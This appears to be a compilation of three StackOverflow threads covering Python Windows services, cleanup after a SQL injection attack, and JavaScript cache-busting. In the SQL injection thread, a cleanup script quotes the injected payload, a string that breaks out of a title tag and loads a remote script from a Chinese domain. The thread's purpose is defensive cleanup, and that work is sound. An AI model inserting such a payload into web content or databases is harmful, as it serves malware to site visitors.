included with ActivePython or can be installed with pywin32 (Python for Windows extensions). This is a basic skeleton for a simple service: import win32serviceutil import win32service import win32event import servicemanager import socket class AppServerSvc (win32serviceutil.ServiceFramework): _svc_name_ = "TestService" _svc_display_name_ = "Test Service" def __init__(self,args): win32serviceutil.ServiceFramework.__init__(self,args) self.hWaitStop = win32event.CreateEvent(None,0,0,None) socket.setdefaulttimeout(60) def SvcStop(self): self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING) win32event.SetEvent(self.hWaitStop) def SvcDoRun(self): servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE, servicemanager.PYS_SERVICE_STARTED, (self._svc_name_,'')) self.main() def main(self): pass if __name__ == '__main__': win32serviceutil.HandleCommandLine(AppServerSvc) Your code would go in the main() method—usually with some kind of infinite loop that might be interrupted by checking a flag, which you set in the SvcStop method A: There are a couple alternatives for installing as a service virtually any Windows executable. Method 1: Use instsrv and srvany from rktools.exe For Windows Home Server or Windows Server 2003 (works with WinXP too), the Windows Server 2003 Resource Kit Tools comes with utilities that can be used in tandem for this, called instsrv.exe and srvany.exe. See this Microsoft KB article KB137890 for details on how to use these utils. For Windows Home Server, there is a great user friendly wrapper for these utilities named aptly "Any Service Installer". Method 2: Use ServiceInstaller for Windows NT There is another alternative using ServiceInstaller for Windows NT (download-able here) with python instructions available. Contrary to the name, it works with both Windows 2000 and Windows XP as well. Here are some instructions for how to install a python script as a service. Installing a Python script Run ServiceInstaller to create a new service. (In this example, it is assumed that python is installed at c:\python25) Service Name : PythonTest Display Name : PythonTest Startup : Manual (or whatever you like) Dependencies : (Leave blank or fill to fit your needs) Executable : c:\python25\python.exe Arguments : c:\path_to_your_python_script\test.py Working Directory : c:\path_to_your_python_script After installing, open the Control Panel's Services applet, select and start the PythonTest service. After my initial answer, I noticed there were closely related Q&A already posted on SO. See also: Can I run a Python script as a service (in Windows)? How? How do I make Windows aware of a service I have written in Python? A: Step by step explanation how to make it work : 1- First create a python file according to the basic skeleton mentioned above. And save it to a path for example : "c:\PythonFiles\AppServerSvc.py" import win32serviceutil import win32service import win32event import servicemanager import socket class AppServerSvc (win32serviceutil.ServiceFramework): _svc_name_ = "TestService" _svc_display_name_ = "Test Service" def __init__(self,args): win32serviceutil.ServiceFramework.__init__(self,args) self.hWaitStop = win32event.CreateEvent(None,0,0,None) socket.setdefaulttimeout(60) def SvcStop(self): self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING) win32event.SetEvent(self.hWaitStop) def SvcDoRun(self): servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE, servicemanager.PYS_SERVICE_STARTED, (self._svc_name_,'')) self.main() def main(self): # Your business logic or call to any class should be here # this time it creates a text.txt and writes Test Service in a daily manner f = open('C:\\test.txt', 'a') rc = None while rc != win32event.WAIT_OBJECT_0: f.write('Test Service \n') f.flush() # block for 24*60*60 seconds and wait for a stop event # it is used for a one-day loop rc = win32event.WaitForSingleObject(self.hWaitStop, 24 * 60 * 60 * 1000) f.write('shut down \n') f.close() if __name__ == '__main__': win32serviceutil.HandleCommandLine(AppServerSvc) 2 - On this step we should register our service. Run command prompt as administrator and type as: sc create TestService binpath= "C:\Python36\Python.exe c:\PythonFiles\AppServerSvc.py" DisplayName= "TestService" start= auto the first argument of binpath is the path of python.exe second argument of binpath is the path of your python file that we created already Don't miss that you should put one space after every "=" sign. Then if everything is ok, you should see [SC] CreateService SUCCESS Now your python service is installed as windows service now. You can see it in Service Manager and registry under : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TestService 3- Ok now. You can start your service on service manager. You can execute every python file that provides this service skeleton. A: A complete pywin32 example using loop or subthread After working on this on and off for a few days, here is the answer I would have wished to find, using pywin32 to keep it nice and self contained. This is complete working code for one loop-based and one thread-based solution. It may work on both python 2 and 3, although I've only tested the latest version on 2.7 and Win7. The loop should be good for polling code, and the tread should work with more server-like code. It seems to work nicely with the waitress wsgi server that does not have a standard way to shut down gracefully. I would also like to note that there seems to be loads of examples out there, like this that are almost useful, but in reality misleading, because they have cut and pasted other examples blindly. I could be wrong. but why create an event if you never wait for it? That said I still feel I'm on somewhat shaky ground here, especially with regards to how clean the exit from the thread version is, but at least I believe there are nothing misleading here. To run simply copy the code to a file and follow the instructions. update: Use a simple flag to terminate thread. The important bit is that "thread done" prints. For a more elaborate example exiting from an uncooperative server thread see my post about the waitress wsgi server. # uncomment mainthread() or mainloop() call below # run without parameters to see HandleCommandLine options # install service with "install" and remove with "remove" # run with "debug" to see print statements # with "start" and "stop" watch for files to appear # check Windows EventViever for log messages import socket import sys import threading import time from random import randint from os import path import servicemanager import win32event import win32service import win32serviceutil # see http://timgolden.me.uk/pywin32-docs/contents.html for details def dummytask_once(msg='once'): fn = path.join(path.dirname(__file__), '%s_%s.txt' % (msg, randint(1, 10000))) with open(fn, 'w') as fh: print(fn) fh.write('') def dummytask_loop(): global do_run while do_run: dummytask_once(msg='loop') time.sleep(3) class MyThread(threading.Thread): def __init__(self): threading.Thread.__init__(self) def run(self): global do_run do_run = True print('thread start\n') dummytask_loop() print('thread done\n') def exit(self): global do_run do_run = False class SMWinservice(win32serviceutil.ServiceFramework): _svc_name_ = 'PyWinSvc' _svc_display_name_ = 'Python Windows Service' _svc_description_ = 'An example of a windows service in Python' @classmethod def parse_command_line(cls): win32serviceutil.HandleCommandLine(cls) def __init__(self, args): win32serviceutil.ServiceFramework.__init__(self, args) self.stopEvt = win32event.CreateEvent(None, 0, 0, None) # create generic event socket.setdefaulttimeout(60) def SvcStop(self): servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE, servicemanager.PYS_SERVICE_STOPPED, (self._svc_name_, '')) self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING) win32event.SetEvent(self.stopEvt) # raise event def SvcDoRun(self): servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE, servicemanager.PYS_SERVICE_STARTED, (self._svc_name_, '')) # UNCOMMENT ONE OF THESE # self.mainthread() # self.mainloop() # Wait for stopEvt indefinitely after starting thread. def mainthread(self): print('main start') self.server = MyThread() self.server.start() print('wait for win32event') win32event.WaitForSingleObject(self.stopEvt, win32event.INFINITE) self.server.exit() print('wait for thread') self.server.join() print('main done') # Wait for stopEvt event in loop. def mainloop(self): print('loop start') rc = None while rc != win32event.WAIT_OBJECT_0: dummytask_once() rc = win32event.WaitForSingleObject(self.stopEvt, 3000) print('loop done') if __name__ == '__main__': SMWinservice.parse_command_line() A: This answer is plagiarizer from several sources on StackOverflow - most of them above, but I've forgotten the others - sorry. It's simple and scripts run "as is". For releases you test you script, then copy it to the server and Stop/Start the associated service. And it should work for all scripting languages (Python, Perl, node.js), plus batch scripts such as GitBash, PowerShell, even old DOS bat scripts. pyGlue is the glue that sits between Windows Services and your script. ''' A script to create a Windows Service, which, when started, will run an executable with the specified parameters. Optionally, you can also specify a startup directory To use this script you MUST define (in class Service) 1. A name for your service (short - preferably no spaces) 2. A display name for your service (the name visibile in Windows Services) 3. A description for your service (long details visible when you inspect the service in Windows Services) 4. The full path of the executable (usually C:/Python38/python.exe or C:WINDOWS/System32/WindowsPowerShell/v1.0/powershell.exe 5. The script which Python or PowerShell will run(or specify None if your executable is standalone - in which case you don't need pyGlue) 6. The startup directory (or specify None) 7. Any parameters for your script (or for your executable if you have no script) NOTE: This does not make a portable script. The associated '_svc_name.exe' in the dist folder will only work if the executable, (and any optional startup directory) actually exist in those locations on the target system Usage: 'pyGlue.exe [options] install|update|remove|start [...]|stop|restart [...]|debug [...]' Options for 'install' and 'update' commands only: --username domain\\username : The Username the service is to run under --password password : The password for the username --startup [manual|auto|disabled|delayed] : How the service starts, default = manual --interactive : Allow the service to interact with the desktop. --perfmonini file: .ini file to use for registering performance monitor data --perfmondll file: .dll file to use when querying the service for performance data, default = perfmondata.dll Options for 'start' and 'stop' commands only: --wait seconds: Wait for the service to actually start or stop. If you specify --wait with the 'stop' option, the service and all dependent services will be stopped, each waiting the specified period. ''' # Import all the modules that make life easy import servicemanager import socket import sys import win32event import win32service import win32serviceutil import win32evtlogutil import os from logging import Formatter, Handler import logging import subprocess # Define the win32api class class Service (win32serviceutil.ServiceFramework): # The following variable are edited by the build.sh script _svc_name_ = "TestService" _svc_display_name_ = "Test Service" _svc_description_ = "Test Running Python Scripts as a Service" service_exe = 'c:/Python27/python.exe' service_script = None service_params = [] service_startDir = None # Initialize the service def __init__(self, args): win32serviceutil.ServiceFramework.__init__(self, args) self.hWaitStop = win32event.CreateEvent(None, 0, 0, None) self.configure_logging() socket.setdefaulttimeout(60) # Configure logging to the WINDOWS Event logs def configure_logging(self): self.formatter = Formatter('%(message)s') self.handler = logHandler() self.handler.setFormatter(self.formatter) self.logger = logging.getLogger() self.logger.addHandler(self.handler) self.logger.setLevel(logging.INFO) # Stop the service def SvcStop(self): self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING) win32event.SetEvent(self.hWaitStop) # Run the service def SvcDoRun(self): self.main() # This is the service def main(self): # Log that we are starting servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE, servicemanager.PYS_SERVICE_STARTED, (self._svc_name_, '')) # Fire off the real process that does the real work logging.info('%s - about to call Popen() to run %s %s %s', self._svc_name_, self.service_exe, self.service_script, self.service_params) self.process = subprocess.Popen([self.service_exe, self.service_script] + self.service_params, shell=False, cwd=self.service_startDir) logging.info('%s - started process %d', self._svc_name_, self.process.pid) # Wait until WINDOWS kills us - retrigger the wait for stop every 60 seconds rc = None while rc != win32event.WAIT_OBJECT_0: rc = win32event.WaitForSingleObject(self.hWaitStop, (1 * 60 * 1000)) # Shut down the real process and exit logging.info('%s - is terminating process %d', self._svc_name_, self.process.pid) self.process.terminate() logging.info('%s - is exiting', self._svc_name_) class logHandler(Handler): ''' Emit a log record to the WINDOWS Event log ''' def emit(self, record): servicemanager.LogInfoMsg(record.getMessage()) # The main code if __name__ == '__main__': ''' Create a Windows Service, which, when started, will run an executable with the specified parameters. ''' # Check that configuration contains valid values just in case this service has accidentally # been moved to a server where things are in different places if not os.path.isfile(Service.service_exe): print('Executable file({!s}) does not exist'.format(Service.service_exe), file=sys.stderr) sys.exit(0) if not os.access(Service.service_exe, os.X_OK): print('Executable file({!s}) is not executable'.format(Service.service_exe), file=sys.stderr) sys.exit(0) # Check that any optional startup directory exists if (Service.service_startDir is not None) and (not os.path.isdir(Service.service_startDir)): print('Start up directory({!s}) does not exist'.format(Service.service_startDir), file=sys.stderr) sys.exit(0) if len(sys.argv) == 1: servicemanager.Initialize() servicemanager.PrepareToHostSingle(Service) servicemanager.StartServiceCtrlDispatcher() else: # install/update/remove/start/stop/restart or debug the service # One of those command line options must be specified win32serviceutil.HandleCommandLine(Service) Now there's a bit of editing and you don't want all your services called 'pyGlue'. So there's a script (build.sh) to plug in the bits and create a customized 'pyGlue' and create an '.exe'. It is this '.exe' which gets installed as a Windows Service. Once installed you can set it to run automatically. #!/bin/sh # This script build a Windows Service that will install/start/stop/remove a service that runs a script # That is, executes Python to run a Python script, or PowerShell to run a PowerShell script, etc if [ $# -lt 6 ]; then echo "Usage: build.sh Name Display Description Executable Script StartupDir [Params]..." exit 0 fi name=$1 display=$2 desc=$3 exe=$4 script=$5 startDir=$6 shift; shift; shift; shift; shift; shift params= while [ $# -gt 0 ]; do if [ "${params}" != "" ]; then params="${params}, " fi params="${params}'$1'" shift done cat pyGlue.py | sed -e "s/pyGlue/${name}/g" | \ sed -e "/_svc_name_ =/s?=.*?= '${name}'?" | \ sed -e "/_svc_display_name_ =/s?=.*?= '${display}'?" | \ sed -e "/_svc_description_ =/s?=.*?= '${desc}'?" | \ sed -e "/service_exe =/s?=.*?= '$exe'?" | \ sed -e "/service_script =/s?=.*?= '$script'?" | \ sed -e "/service_params =/s?=.*?= [${params}]?" | \ sed -e "/service_startDir =/s?=.*?= '${startDir}'?" > ${name}.py cxfreeze ${name}.py --include-modules=win32timezone Installation - copy the '.exe' the server and the script to the specified folder. Run the '.exe', as Administrator, with the 'install' option. Open Windows Services, as Adminstrator, and start you service. For upgrade, just copy the new version of the script and Stop/Start the service. Now every server is different - different installations of Python, different folder structures. I maintain a folder for every server, with a copy of pyGlue.py and build.sh. And I create a 'serverBuild.sh' script for rebuilding all the service on that server. # A script to build all the script based Services on this PC sh build.sh AutoCode 'AutoCode Medical Documents' 'Autocode Medical Documents to SNOMED_CT and AIHW codes' C:/Python38/python.exe autocode.py C:/Users/russell/Documents/autocoding -S -T A: The accepted answer using win32serviceutil works but is complicated and makes debugging and changes harder. It is far easier to use NSSM (the Non-Sucking Service Manager). You write and comfortably debug a normal python program and when it finally works you use NSSM to install it as a service in less than a minute: From an elevated (admin) command prompt you run nssm.exe install NameOfYourService and you fill-in these options: * *path: (the path to python.exe e.g. C:\Python27\Python.exe) *Arguments: (the path to your python script, e.g. c:\path\to\program.py) By the way, if your program prints useful messages that you want to keep in a log file NSSM can also handle this and a lot more for you. A: This doesn't answer the original question, but might help other people that want to automatically start a Python script at Windows startup: Have a look at the Windows Task Scheduler instead, it is way easier if you just want to start a script after boot without all the service functionality of a Windows Service. Create a new task, select "At startup" as trigger, "Start program" as action with "C:\Python39\python.exe" as the program (or wherever your python.exe is) and the full path to your script ("C:...\my_dir\xyz.py") as argument (you can use " if the path contains spaces). You can also select the path of your script (without the .py file, e.g. "C:...\my_dir") for "start in" if you use relative paths in your script, e.g. for logging. A: https://www.chrisumbel.com/article/windows_services_in_python * *Follow up the PySvc.py *changing the dll folder I know this is old but I was stuck on this forever. For me, this specific problem was solved by copying this file - pywintypes36.dll From -> Python36\Lib\site-packages\pywin32_system32 To -> Python36\Lib\site-packages\win32 setx /M PATH "%PATH%;C:\Users\user\AppData\Local\Programs\Python\Python38-32;C:\Users\user\AppData\Local\Programs\Python\Python38-32\Scripts;C:\Users\user\AppData\Local\Programs\Python\Python38-32\Lib\site-packages\pywin32_system32;C:\Users\user\AppData\Local\Programs\Python\Python38-32\Lib\site-packages\win32 *changing the path to python folder by cd C:\Users\user\AppData\Local\Programs\Python\Python38-32 *NET START PySvc *NET STOP PySvc
{ "language": "en", "url": "https://stackoverflow.com/questions/32404", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "324" }
Q: What's the best way of cleaning up after a SQL Injection? I've been tasked with the the maintenance of a nonprofit website that recently fell victim to a SQL injection attack. Someone exploited a form on the site to add text to every available text-like field in the database (varchar, nvarchar, etc.) which, when rendered as HTML, includes and executes a JavaScript file. A Google search of the URL indicates that it's from email spammers based out of Romania or China, but that's not what's important right now. I went through and manually removed the information from the the text fields that render on most visible and popular pages on the site but I'm curious as to what would be the best programmatic way of removing the text from the other text fields on the site. Obviously there's more that needs to be done (hardening the site against SQL injections, using something like markdown instead of storing HTML, etc.) and I am working on those but for the time being what I really need is a good way to go in and programmatically remove the injected text. I know what the exact text is, it's the same every time, and it's always appended to the end of any text field. I can't afford to strip out all HTML in the database at this time and I don't know when this happened exactly so I can't just roll back to a backup. Also, the site is on shared hosting and I cannot connect to the database directly with SQL Server tools. I can execute queries against it though, so if there's any way of constructing a SQL update statement to the effect of "hey find all the text fields in all of the tables in the entire database and do this to clean them" that would be the best. A: Restore the data from a recent backup. A: I was victim and you can use it to clean up UPDATE Table SET TextField = SUBSTRING(TextField, 1, CHARINDEX('</title', TextField) - 1) WHERE (ID IN (SELECT ID FROM Table WHERE (CHARINDEX('</title', Textfield, 1) > 0))) A: Assuming you've fallen victim to the same attack as everyone else, then SQLMenace' code is close. However, that attack uses a number of different script urls, so you'll have to customize it to make sure it matches the url you're seeing in your database. I wrote about it as well, and my solution code included a more-generic cleanup. One important point is that the very first thing you need to do is take down the site. Right now you're actively serving malware to your users, and that could put you in a legal fix later. Put up a placeholder page so your users aren't left in the dark, but don't keep serving up malware. Then you can fix the site to make sure it's no longer vulnerable to injection. The simplest way to do that for this particular attack is to just disable sysobjects/syscolumns permissions for your web user, but you'll want to make a more through cleanup as well or it's only a matter of time until you're cracked again. Then you can use the code provided to clean up the site and put it back live. A: This will reverse that, also it would be wise to take sysobject permissions away from the username your site runs with, and to sanitize input of course DECLARE @T VARCHAR(255),@C VARCHAR(4000) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('if exists (select 1 from ['+@T+'] where ['+@C+'] like ''%"></title><script src="http://1.verynx.cn/w.js"></script><!--'') begin print ''update ['+@T+'] set ['+@C+']=replace(['+@C+'],''''"></title><script src="http://1.verynx.cn/w.js"></script><!--'''','''''''') where ['+@C+'] like ''''%"></title><script src="http://1.verynx.cn/w.js"></script><!--'''''' end') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor I wrote about this a while back here: Microsoft Has Released Tools To Address SQL Injection Attacks
{ "language": "en", "url": "https://stackoverflow.com/questions/32412", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "9" }
Q: How can I force clients to refresh JavaScript files? We are currently working in a private beta and so are still in the process of making fairly rapid changes, although obviously as usage is starting to ramp up, we will be slowing down this process. That being said, one issue we are running into is that after we push out an update with new JavaScript files, the client browsers still use the cached version of the file and they do not see the update. Obviously, on a support call, we can simply inform them to do a ctrlF5 refresh to ensure that they get the up-to-date files from the server, but it would be preferable to handle this before that time. Our current thought is to simply attach a version number onto the name of the JavaScript files and then when changes are made, increment the version on the script and update all references. This definitely gets the job done, but updating the references on each release could get cumbersome. As I'm sure we're not the first ones to deal with this, I figured I would throw it out to the community. How are you ensuring clients update their cache when you update your code? If you're using the method described above, are you using a process that simplifies the change? A: For ASP.NET I suppose next solution with advanced options (debug/release mode, versions): Js or Css files included by such way: <script type="text/javascript" src="Scripts/exampleScript<%=Global.JsPostfix%>" /> <link rel="stylesheet" type="text/css" href="Css/exampleCss<%=Global.CssPostfix%>" /> Global.JsPostfix and Global.CssPostfix is calculated by the following way in Global.asax: protected void Application_Start(object sender, EventArgs e) { ... string jsVersion = ConfigurationManager.AppSettings["JsVersion"]; bool updateEveryAppStart = Convert.ToBoolean(ConfigurationManager.AppSettings["UpdateJsEveryAppStart"]); int buildNumber = System.Reflection.Assembly.GetExecutingAssembly().GetName().Version.Revision; JsPostfix = ""; #if !DEBUG JsPostfix += ".min"; #endif JsPostfix += ".js?" + jsVersion + "_" + buildNumber; if (updateEveryAppStart) { Random rand = new Random(); JsPosfix += "_" + rand.Next(); } ... } A: As far as I know a common solution is to add a ?<version> to the script's src link. For instance: <script type="text/javascript" src="myfile.js?1500"></script> I assume at this point that there isn't a better way than find-replace to increment these "version numbers" in all of the script tags? You might have a version control system do that for you? Most version control systems have a way to automatically inject the revision number on check-in for instance. It would look something like this: <script type="text/javascript" src="myfile.js?$$REVISION$$"></script> Of course, there are always better solutions like this one. A: If you're generating the page that links to the JS files a simple solution is appending the file's last modification timestamp to the generated links. This is very similar to Huppie's answer, but works in version control systems without keyword substitution. It's also better than append the current time, since that would prevent caching even when the file didn't change at all. A: In PHP: function latest_version($file_name){ echo $file_name."?".filemtime($_SERVER['DOCUMENT_ROOT'] .$file_name); } In HTML: <script type="text/javascript" src="<?php latest_version('/a-o/javascript/almanacka.js'); ?>">< /script> How it works: In HTML, write the filepath and name as you wold do, but in the function only. PHP gets the filetime of the file and returns the filepath+name+"?"+time of latest change A: We have been creating a SaaS for users and providing them a script to attach in their website page, and it was not possible to attach a version with the script as user will attach the script to their website for functionalities and i can't force them to change the version each time we update the script So, we found a way to load the newer version of the script each time user calls the original script the script link provided to user <script src="https://thesaasdomain.com/somejsfile.js" data-ut="user_token"></script> the script file if($('script[src^="https://thesaasdomain.com/somejsfile.js?"]').length !== 0) { init(); } else { loadScript("https://thesaasdomain.com/somejsfile.js?" + guid()); } var loadscript = function(scriptURL) { var head = document.getElementsByTagName('head')[0]; var script = document.createElement('script'); script.type = 'text/javascript'; script.src = scriptURL; head.appendChild(script); } var guid = function() { return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g, function(c) { var r = Math.random() * 16 | 0, v = c == 'x' ? r : (r & 0x3 | 0x8); return v.toString(16); }); } var init = function() { // our main code } Explanation: The user have attached the script provided to them in their website and we checked for the unique token attached with the script exists or not using jQuery selector and if not then load it dynamically with newer token (or version) This is call the same script twice which could be a performance issue, but it really solves the problem of forcing the script to not load from the cache without putting the version in the actual script link given to the user or client Disclaimer: Do not use if performance is a big issue in your case. A: Google Page-Speed: Don't include a query string in the URL for static resources. Most proxies, most notably Squid up through version 3.0, do not cache resources with a "?" in their URL even if a Cache-control: public header is present in the response. To enable proxy caching for these resources, remove query strings from references to static resources, and instead encode the parameters into the file names themselves. In this case, you can include the version into URL ex: http://abc.com/v1.2/script.js and use apache mod_rewrite to redirect the link to http://abc.com/script.js. When you change the version, client browser will update the new file. A: The jQuery function getScript can also be used to ensure that a js file is indeed loaded every time the page is loaded. This is how I did it: $(document).ready(function(){ $.getScript("../data/playlist.js", function(data, textStatus, jqxhr){ startProgram(); }); }); Check the function at http://api.jquery.com/jQuery.getScript/ By default, $.getScript() sets the cache setting to false. This appends a timestamped query parameter to the request URL to ensure that the browser downloads the script each time it is requested. A: This usage has been deprected: https://developer.mozilla.org/en-US/docs/Web/HTML/Using_the_application_cache This answer is only 6 years late, but I don't see this answer in many places... HTML5 has introduced Application Cache which is used to solve this problem. I was finding that new server code I was writing was crashing old javascript stored in people's browsers, so I wanted to find a way to expire their javascript. Use a manifest file that looks like this: CACHE MANIFEST # Aug 14, 2014 /mycode.js NETWORK: * and generate this file with a new time stamp every time you want users to update their cache. As a side note, if you add this, the browser will not reload (even when a user refreshes the page) until the manifest tells it to. A: How about adding the filesize as a load parameter? <script type='text/javascript' src='path/to/file/mylibrary.js?filever=<?=filesize('path/to/file/mylibrary.js')?>'></script> So every time you update the file the "filever" parameter changes. How about when you update the file and your update results in the same file size? what are the odds? A: My colleague just found a reference to that method right after I posted (in reference to css) at http://www.stefanhayden.com/blog/2006/04/03/css-caching-hack/. Good to see that others are using it and it seems to work. I assume at this point that there isn't a better way than find-replace to increment these "version numbers" in all of the script tags? A: In asp.net mvc you can use @DateTime.UtcNow.ToString() for js file version number. Version number auto change with date and you force clients browser to refresh automatically js file. I using this method and this is work well. <script src="~/JsFilePath/[email protected]()"></script> A: Not all browsers cache files with '?' in it. What I did to make sure it was cached as much as possible, I included the version in the filename. So instead of stuff.js?123, I did stuff_123.js I used mod_redirect(I think) in apache to to have stuff_*.js to go stuff.js A: One solution is to append a query string with a timestamp in it to the URL when fetching the resource. This takes advantage of the fact that a browser will not cache resources fetched from URLs with query strings in them. You probably don't want the browser not to cache these resources at all though; it's more likely that you want them cached, but you want the browser to fetch a new version of the file when it is made available. The most common solution seems to be to embed a timestamp or revision number in the file name itself. This is a little more work, because your code needs to be modified to request the correct files, but it means that, e.g. version 7 of your snazzy_javascript_file.js (i.e. snazzy_javascript_file_7.js) is cached on the browser until you release version 8, and then your code changes to fetch snazzy_javascript_file_8.js instead. A: The advantage of using a file.js?V=1 over a fileV1.js is that you do not need to store multiple versions of the JavaScript files on the server. The trouble I see with file.js?V=1 is that you may have dependant code in another JavaScript file that breaks when using the new version of the library utilities. For the sake of backwards compatibility, I think it is much better to use jQuery.1.3.js for your new pages and let existing pages use jQuery.1.1.js, until you are ready to upgrade the older pages, if necessary. A: Use a version GET variable to prevent browser caching. Appending ?v=AUTO_INCREMENT_VERSION to the end of your url prevents browser caching - avoiding any and all cached scripts. A: Athough it is framework specific, Django 1.4 has the staticfiles app functionality which works in a similar fashion to the 'greenfelt' site in the above answer A: Cache Busting in ASP.NET Core via a tag helper will handle this for you and allow your browser to keep cached scripts/css until the file changes. Simply add the tag helper asp-append-version="true" to your script (js) or link (css) tag: <link rel="stylesheet" href="~/css/site.min.css" asp-append-version="true"/> Dave Paquette has a good example and explanation of cache busting here (bottom of page) Cache Busting A: location.reload(true); see https://www.w3schools.com/jsref/met_loc_reload.asp I dynamically call this line of code in order to ensure that javascript has been re-retrieved from the web server instead of from the browser's cache in order to escape this problem. A: The common practice nowadays is to generate a content hash code as part of the file name to force the browser especially IE to reload the javascript files or css files. For example, vendor.a7561fb0e9a071baadb9.js main.b746e3eb72875af2caa9.js It is generally the job for the build tools such as webpack. Here is more details if anyone wants to try out if you are using webpack. A: For ASP.NET pages I am using the following BEFORE <script src="/Scripts/pages/common.js" type="text/javascript"></script> AFTER (force reload) <script src="/Scripts/pages/common.js?ver<%=DateTime.Now.Ticks.ToString()%>" type="text/javascript"></script> Adding the DateTime.Now.Ticks works very well. A: Appending the current time to the URL is indeed a common solution. However, you can also manage this at the web server level, if you want to. The server can be configured to send different HTTP headers for javascript files. For example, to force the file to be cached for no longer than 1 day, you would send: Cache-Control: max-age=86400, must-revalidate For beta, if you want to force the user to always get the latest, you would use: Cache-Control: no-cache, must-revalidate A: One simple way. Edit htaccess RewriteEngine On RewriteBase / RewriteCond %{REQUEST_URI} \.(jpe?g|bmp|png|gif|css|js|mp3|ogg)$ [NC] RewriteCond %{QUERY_STRING} !^(.+?&v33|)v=33[^&]*(?:&(.*)|)$ [NC] RewriteRule ^ %{REQUEST_URI}?v=33 [R=301,L] A: You can add file version to your file name so it will be like: https://www.example.com/script_fv25.js fv25 => file version nr. 25 And in your .htaccess put this block which will delete the version part from link: RewriteEngine On RewriteRule (.*)_fv\d+\.(js|css|txt|jpe?g|png|svg|ico|gif) $1.$2 [L] so the final link will be: https://www.example.com/script.js A: FRONT-END OPTION I made this code specifically for those who can't change any settings on the backend. In this case the best way to prevent a very long cache is with: new Date().getTime() However, for most programmers the cache can be a few minutes or hours so the simple code above ends up forcing all users to download "the each page browsed". To specify how long this item will remain without reloading I made this code and left several examples below: // cache-expires-after.js v1 function cacheExpiresAfter(delay = 1, prefix = '', suffix = '') { // seconds let now = new Date().getTime().toString(); now = now.substring(now.length - 11, 10); // remove decades and milliseconds now = parseInt(now / delay).toString(); return prefix + now + suffix; }; // examples (of the delay argument): // the value changes every 1 second var cache = cacheExpiresAfter(1); // see the sync setInterval(function(){ console.log(cacheExpiresAfter(1), new Date().getSeconds() + 's'); }, 1000); // the value changes every 1 minute var cache = cacheExpiresAfter(60); // see the sync setInterval(function(){ console.log(cacheExpiresAfter(60), new Date().getMinutes() + 'm:' + new Date().getSeconds() + 's'); }, 1000); // the value changes every 5 minutes var cache = cacheExpiresAfter(60 * 5); // OR 300 // the value changes every 1 hour var cache = cacheExpiresAfter(60 * 60); // OR 3600 // the value changes every 3 hours var cache = cacheExpiresAfter(60 * 60 * 3); // OR 10800 // the value changes every 1 day var cache = cacheExpiresAfter(60 * 60 * 24); // OR 86400 // usage example: let head = document.head || document.getElementsByTagName('head')[0]; let script = document.createElement('script'); script.setAttribute('src', '//unpkg.com/[email protected]/dist/sweetalert.min.js' + cacheExpiresAfter(60 * 5, '?')); head.append(script); // this works? let waitSwal = setInterval(function() { if (window.swal) { clearInterval(waitSwal); swal('Script successfully injected', script.outerHTML); }; }, 100); A: Simplest solution? Don't let the browser cache at all. Append the current time (in ms) as a query. (You are still in beta, so you could make a reasonable case for not optimizing for performance. But YMMV here.) A: Below worked for me: <head> <meta charset="UTF-8"> <meta http-equiv="cache-control" content="no-cache, must-revalidate, post-check=0, pre-check=0" /> <meta http-equiv="cache-control" content="max-age=0" /> <meta http-equiv="expires" content="0" /> <meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" /> <meta http-equiv="pragma" content="no-cache" /> </head> A: If you are using PHP and Javascript then the following should work for you especially in the situation where you are doing multiple times changes on the file. So, every time you cannot change its version. So, the idea is to create a random number in PHP and then assign it as a version of the JS file. $fileVersion = rand(); <script src="addNewStudent.js?v=<?php echo $fileVersion; ?>"></script> A: <script> var version = new Date().getTime(); var script = document.createElement("script"); script.src = "app.js?=" + version; document.body.appendChild(script); </script> Feel free to delete this if someone's already posted it somewhere in the plethora of answers above. A: A simple trick that works fine for me to prevent conflicts between older and newer javascript files. That means: If there is a conflict and some error occurs, the user will be prompted to press Ctrl-F5. At the top of the page add something like <h1 id="welcome"> Welcome to this page <span style="color:red">... press Ctrl-F5</span></h1> looking like Let this line of javascript be the last to be executed when loading the page: document.getElementById("welcome").innerHTML = "Welcome to this page" In case that no error occurs the welcome greeting above will hardly be visible and almost immediately be replaced by A: You can do this with .htaccess Add into your .htaccess file the following lines: # DISABLE CACHING <IfModule mod_headers.c> <FilesMatch "\.js$"> Header set Cache-Control "no-store, max-age=0" </FilesMatch> </IfModule>
{ "language": "en", "url": "https://stackoverflow.com/questions/32414", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "691" }
